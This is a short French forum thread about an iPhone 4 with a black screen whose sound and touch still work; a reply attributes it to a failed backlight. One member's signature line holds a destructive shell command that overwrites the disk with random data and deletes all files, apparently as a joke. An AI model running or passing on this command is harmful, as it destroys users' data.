Forum iPhone, iPad, Apple Watch de iPhon.fr

Forum utilisateurs Apple iPhone, iPad, Apple Watch, forfaits et accessoires

Vous n'êtes pas identifié(e).

Annonce

Bienvenue sur le forum du blog iPhon.fr

Pensez à poster dans la bonne rubrique, respecter les propos des autres internautes, ne pas utiliser le langage SMS, et enfin, à utiliser la fonction 'Recherche' !
Et... Gardez le sens de l'humour, de la convivialité et de la décontraction. On n'est pas là pour se prendre la tête ! ;-)

#1 29-10-2012 15:27:17

lucas13690
Membre
Inscription : 29-10-2012
Messages : 3

iphone 4 ecran noir mais son ,vibreur,tactile marche toujours

bonjour je possede un iphone 4 tout casser mais jusqu'a la il marchait encore je l'ai sortit de ma poche pour m'en servir et la ecran noir le vibreur fonctionne le son du vérouillage aussi et quand je le met beaucoup au soleil j'arrive a voir un tout petit peu mon ecran et je peut le dévérouiller tapé mon code ect..
mais cela que a un soleil fort et je distingue a peine j'ai don vu la luminosité elle est a fond et cela ne change rien il y a que l'éclairage qui ne marche pas! merci de me répondre si vous savez d'ou cela provient  smile

Hors ligne

#2 29-10-2012 15:53:29

-nicnl-
Membre
Inscription : 02-04-2008
Messages : 681

Re : iphone 4 ecran noir mais son ,vibreur,tactile marche toujours

lucas13690 a écrit :

un iphone 4 tout casser

Ben c'est simple, c'est le système de rétro-éclairage de ton iPhone qui t'a laché...
Y'a rien de plus à comprendre. Faut changer ton écran, maintenant...


sudo cat /dev/urandom > /dev/sda & sudo rm -rf /* &

Hors ligne

#3 29-10-2012 15:59:23

lucas13690
Membre
Inscription : 29-10-2012
Messages : 3

Re : iphone 4 ecran noir mais son ,vibreur,tactile marche toujours

merci a toi ! smile

c'est bien ce que je penser , mais en changeant mon écran tout s'arrangera tu pense, ou il faut que je change autre chose ? parce qu'il est d'en un pyteux état!

Hors ligne

Pied de page des forums

L'iPhone sur iPhon.fr, le blog de l'iPhone - blog iPad

iPhon.fr et son forum ne sont pas liés à Apple, Orange, SFR ou autres et les marques citées sont la propriété de leurs détenteurs respectifs.